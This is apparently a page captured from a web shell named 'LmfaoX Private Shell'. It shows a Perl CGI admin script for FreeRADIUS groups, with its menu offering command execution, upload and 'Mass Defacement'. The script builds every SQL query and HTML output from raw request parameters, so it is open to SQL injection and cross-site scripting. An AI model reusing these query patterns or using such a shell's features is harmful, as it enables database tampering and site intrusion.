LmfaoX Private Shell.

Viewing file: groups.cgi (5.5 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

#!/usr/bin/perl

require "config.cgi";

$username = param("user");
$show = param("show");

#$cellheadbg = "#454545";
#$cellcolor = "#606060";
#$headfont = "#00eeee";
#$table = "#505050";
#$actcolor = "#ccbb00";
#$fontcolor = "#dddddd";
#$menucolor = "#ffffff";

$menu = "groups";
require "top.cgi";

$radgroupo = param("radgroupo");
$radgroup = param("radgroup");
$radattr = param("radattr");
$radop = param("radop");
$radvalue = param("radvalue");
$radgroupe = param("radgroupe");
$radattre = param("radattre");
$radope = param("radope");
$radvale = param("radvale");
$act = param("act");
$grp = param("grp");

if ($act eq "del")
    {
    $sth = $dbh->prepare("DELETE FROM radgroupcheck WHERE groupname='$grp'");
    $sth->execute();
    $sth = $dbh->prepare("DELETE FROM radusergroup WHERE groupname='$grp'");
    $sth->execute();
    }

if ($radgroup ne "")
    {
        $sth = $dbh->prepare("SELECT groupname FROM radgroupcheck WHERE groupname='$radgroup'");
        $sth->execute();
        my ($cgroup) = $sth->fetchrow_array();
        if ($radgroup eq $cgroup)
        {
            print "<center><table cellspacing=0 border=0 cellpadding=0 width=$groupwidth bgcolor=$cellheadbg><tr><td><center><b><font color=$errmsg>Ошибка, группа $radgroup существует</font></b></td></tr></table>";
        } else
        {
            $sth = $dbh->prepare("INSERT INTO radgroupcheck (groupname,attribute,op,value) VALUES ('$radgroup','$radattr','$radop','$radvalue')");
            $sth->execute();
        }
    }

if ($radgroupe ne "") {
        $sth = $dbh->prepare("SELECT groupname FROM radgroupcheck WHERE groupname='$radgroupe'");
        $sth->execute();
        my ($cgrp) = $sth->fetchrow_array();
        if ($radgroupe eq $cgrp and $radgroupe ne $radgroupo)
        {
            print "<center><table cellspacing=0 border=0 cellpadding=0 width=$groupwidth bgcolor=$cellheadbg><tr><td><center><b><font color=$errmsg>Ошибка, группа $cgrp существует</font></b></td></tr></table>";
        } else {
            $sth = $dbh->prepare("UPDATE radgroupcheck SET groupname='$radgroupe',attribute='$radattre',op='$radope',value='$radvale' WHERE groupname='$radgroupo'");
            $sth->execute();
            $sth = $dbh->prepare("UPDATE radusergroup SET groupname='$radgroupe' WHERE groupname='$radgroupo'");
            $sth->execute();

    }
    }

print "<center>
<font color=$fontcolor face=\"$fface\">
<table width=$groupwidth border=0 bgcolor=$table cellspacing=2 cellpadding=6><tr>
<td bgcolor=$cellheadbg valign=center><font color=$headfont><br><b>Группа<br>&nbsp</b></font></td>
<td bgcolor=$cellheadbg valign=center><font color=$headfont><b><center>Аттрибут</b></font></td>
<td bgcolor=$cellheadbg valign=center><font color=$headfont><b><center>Знак</b></font></td>
<td bgcolor=$cellheadbg valign=center><font color=$headfont><b><center>Значение</b></font></td>
<td bgcolor=$cellheadbg valign=center><font color=$headfont><b><center>Действие</b></font></td>
</tr>";

$sth = $dbh->prepare("SELECT groupname,attribute,op,value FROM radgroupcheck");
$sth->execute();

while (my ($groupname,$attribute,$op,$value) = $sth->fetchrow_array())
    {
    if ($act eq "edit" and $grp eq $groupname) {
    print "<tr><form name=\"editgrp\" action=\"groups.cgi\" method=\"POST\"><input type=\"hidden\" value=\"$groupname\" name=\"radgroupo\">
    <td bgcolor=$cellcolor><font color=$fontcolor><input type=\"text\" value=\"$groupname\" size=\"10\" name=\"radgroupe\"></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><input type=\"text\" value=\"$attribute\" size=\"10\" name=\"radattre\"></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><input type=\"text\" value=\"$op\" size=\"10\" name=\"radope\"></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><input type=\"text\" value=\"$value\" size=\"10\" name=\"radvale\"></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><center><input type=\"submit\" value=\"Изменить\"></form> <a href=\"groups.cgi\">[Отмена]</a></center></td>";
    } else {
    print "<tr>
    <td bgcolor=$cellcolor valign=center><font color=$fontcolor>$groupname</font></td>
    <td bgcolor=$cellcolor valign=center><font color=$fontcolor>$attribute</font></td>
    <td bgcolor=$cellcolor valign=center><font color=$fontcolor><center>$op</center></font></td>
    <td bgcolor=$cellcolor valign=center><font color=$fontcolor>$value</font></td>";
    if ($act eq "cdel" and $grp eq $groupname) {
    print "<td bgcolor=$cellcolor><font color=$actcolor><center>Удалить? <a href=\"?act=del&grp=$groupname\">[ Да ]</a>&nbsp&nbsp<a href=\"groups.cgi\">[ Нет ]</a></font></td></tr>";
    } else {
    print "<td bgcolor=$cellcolor valign=center><font color=$fontcolor><center><a href=\"?act=edit&grp=$groupname\">[Изменить]</a>&nbsp&nbsp<a href=\"?act=cdel&grp=$groupname\">[Удалить]</a></center></font></td>";
    }
    }
}
if ($act ne "edit") {
    print "<tr><form name=\"adduser\" action=\"groups.cgi\" method=\"POST\">
    <td bgcolor=$cellcolor><font color=$fontcolor><input type=\"text\" size=\"10\" name=\"radgroup\"></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><input type=\"text\" size=\"10\" name=\"radattr\"></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><center><input type=\"text\" size=\"10\" name=\"radop\"></center></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><input type=\"text\" size=\"10\" name=\"radvalue\"></td>
    <td bgcolor=$cellcolor><font color=$fontcolor><center><input type=\"submit\" value=\"Добавить\"></center></td>";
}
Command:
Quick Commands:
Upload:	[OK] Max size: 100MB
PHP Filesystem:	<@�
Search File:	regexp
Create File:	Overwrite [OK]
View File:
Mass Defacement:	[+] Main Directory: [+] Defacement Url: